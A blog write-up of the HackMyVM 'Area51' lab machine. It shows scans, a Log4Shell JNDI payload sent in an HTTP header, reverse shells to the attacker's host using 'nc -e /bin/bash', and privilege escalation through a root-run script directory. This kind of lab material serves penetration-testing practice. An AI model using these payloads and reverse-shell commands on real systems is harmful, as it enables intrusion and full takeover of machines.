HackMyVM - Area51


Area51 by bit is listed as medium difficulty, this is very subjective!!!
It is difficult to find the correct request to get the initial foothold but subsequent steps are a bit more straight forwards.

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:96:87:13      1      60  PCS Systemtechnik GmbH

 10.0.0.104      08:00:27:e9:7a:77      1      60  PCS Systemtechnik GmbH


-- Active scan completed, 2 Hosts found.

Scan it

└─$  nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.104

Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 06:24 EST

Nmap scan report for 10.0.0.104

Host is up (0.00072s latency).

Not shown: 65532 closed ports

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)

|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)

|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)

80/tcp   open  http        Apache httpd 2.4.51 ((Debian))

|_http-server-header: Apache/2.4.51 (Debian)

|_http-title: FBI Access

8080/tcp open  nagios-nsca Nagios NSCA

|_http-title: Site doesn't have a title (application/json).

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 16.76 seconds


└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.104/ -x html,php,txt -t 150                      

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://10.0.0.104/

[+] Method:                  GET

[+] Threads:                 150

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              html,php,txt

[+] Follow Redirect:         true

[+] Timeout:                 10s

===============================================================

2021/12/26 06:31:54 Starting gobuster in directory enumeration mode

===============================================================

/index.html           (Status: 200) [Size: 1131]

/radar                (Status: 200) [Size: 730] 

/video                (Status: 200) [Size: 4655]

/note.txt             (Status: 200) [Size: 119] 

/moon                 (Status: 200) [Size: 440] 

/server-status        (Status: 403) [Size: 275] 

                                                


So we have ssh (22) that seems like it will accept a username & password, 
http (80) - some rather fun html5 pages and a note.txt but I didnt find anything else interesting.
http (8080) - seems to just return a JSON bad request to all paths tried.

RCE to shell

From the note.txt (and the fact it was a 1.8Gb download!) it is reasonable to think port 8080 is Apache\Tomcat and susceptible to Log4j RCE... if the correct request can be found.
I downloaded github repo.

┌──(kali㉿kali)-[~/area51]

└─$ git clone https://github.com/kozmer/log4j-shell-poc.git

This also required a jdk downloading from Oracle to allow it to build the custom java exploit files.
(Follow the ReadMe !)

This vulnerable app uses the path /login so I still need to find another example :(
Some searching and a few attempts later....
https://www.lunasec.io/docs/blog/log4j-zero-day/
This example expects the request header "X-Api-Version"

└─$ curl -H 'X-Api-Version:1' http://10.0.0.104:8080/

Hello, world! 

So this looks like the right app!
As I already have the "kozmer" version installed and setup I continued with that one.

3 Terminal sessions are required:
1. netcat listener on port 9001 (default for exploit  repo)

2. the python script to build and host the exploit

└─$ python3 poc.py --userip 10.0.0.10



[!] CVE: CVE-2021-44228

[!] Github repo: https://github.com/kozmer/log4j-shell-poc


[+] Exploit java class created success

[+] Setting up LDAP server


[+] Send me: ${jndi:ldap://10.0.0.10:1389/a}

[+] Starting Webserver on port 8000 http://0.0.0.0:8000


Listening on 0.0.0.0:1389


3. a session to issue the curl command.

└─$ curl -H 'X-Api-Version:${jndi:ldap://10.0.0.10:1389/a}' http://10.0.0.104:8080/


└─$ nc -nvlp 9001                              

listening on [any] 9001 ...

connect to [10.0.0.10] from (UNKNOWN) [10.0.0.104] 47558

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)


And we have a shell, but looking around it's inside a docker

Escalate to user

Downloading linpeas.sh and looking at the output identified:

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                                                         

-rw-------    1 root     root         32768 Dec 24 12:00 /tmp/hsperfdata_root/1                

-rwxr-xr-x    1 root     root           194 Dec 19 23:11 /tmp/rev.elf

-rw-r--r--    1 root     root            10 Dec 19 19:19 /var/tmp/.roger


That contained a password - so a nice stable ssh session can be made as roger.
(just need to ctrl+c out of the custom logon script)

Escalate to root

Downloading and running linpeas.sh again and looking through the output

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)

╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files

  Group roger:

/etc/pam.d/kang

That contains the password for kang.
kang's home directory has something odd happening, a file keeps appearing and disapering

kang@area51:~$ ls
weComeInPeace.sh
kang@area51:~$ ls
kang@area51:~$ ls
kang@area51:~$ ls
weComeInPeace.sh

kang@area51:~$ cat *

echo hi

kang@area51:~$ echo "echo test >/tmp/test" > test.sh

kang@area51:~$ ls /tmp/test -l

-rw-r--r-- 1 root root 5 Dec 24 12:02 /tmp/test

kang@area51:~$ echo "nc -e /bin/bash 10.0.0.10 4444" >test.sh

So it does look like root creates a shell script, executes all the .sh files and deletes them
so a simple reverse shell is a quick solution.

$ nc -nvlp 4444

listening on [any] 4444 ...

connect to [10.0.0.10] from (UNKNOWN) [10.0.0.104] 34830

python3 -c 'import pty; pty.spawn("/bin/bash")'

root@area51:/# 


References:


Comments

Post a Comment

Popular posts from this blog

Zeug - HackMyVM

Image
  This was a really nice machine, if you like to be annoyed by trying to do the same thing many different ways until you eventually get somewhere... Thank you c4rta - looking forward to your next machine ;) Find it sudo netdiscover -r 10.0.0.0/24 -i eth1 -P  _____________________________________________________________________________    IP            At MAC Address     Count     Len  MAC Vendor / Hostname        -----------------------------------------------------------------------------  10.0.0.1        08:00:27:41:d0:fa      1      60  PCS Systemtechnik GmbH  10.0.0.123      08:00:27:fc:d6:0f      1      60  PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. nmap -v -T4 -p- 10.0.0.123        Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-07 04:21 EST Initiating Ping Scan at 04:21 Scanning 10.0.0.123 [2 ports] Completed Ping Scan at 04:21, 0.01s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 04:21 Completed Parallel DNS resolution of 1 host
Read more

Espo - HackMyVM

Image
Another interesting machine from cromiphi... Writeup abridged to remove the several hour pause before making any progress!!! Discovery: ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo netdiscover -r 10.0.0.0/24 -i eth1 -P _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.0.0.1 08:00:27:c5:8d:93 1 60 PCS Systemtechnik GmbH 10.0.0.161 08:00:27:4f:55:18 1 60 PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo nmap -sC -sV -O -p- -oN nmap.out 10.0.0.161 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 05:21 EST Nmap scan report for 10.0.0.161 Host is up (0.0016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
Read more

HackMyVM - Comingsoon

Image
  Find it └─ $ sudo netdiscover -r 10.0.0.0/24 -P | tee findit [sudo] password for kali:     _____________________________________________________________________________    IP             At MAC Address     Count     Len   MAC Vendor / Hostname         -----------------------------------------------------------------------------   10.0.0.1         08:00:27:96:87:13       1       60   PCS Systemtechnik GmbH   10.0.0.90       08:00:27:03:05:3c       1       60   PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found.      Scan it └─ $ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.90   Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 12:49 EST Nmap scan report for 10.0.0.90 Host is up (0.00097s latency). Not shown: 65533 closed ports PORT   STATE SERVICE VERSION 22/tcp open   ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey:   |   3072 bc:fb:ec:b8:93:d4:e2:78:76:eb:1b:dc:4b:a7:7f:9b (RSA) |   256 31:41:a0:d7:e9:3c:79:11:c2:f0:81:a0:fe:2d:f9:b0 (ECDSA) |_  
Read more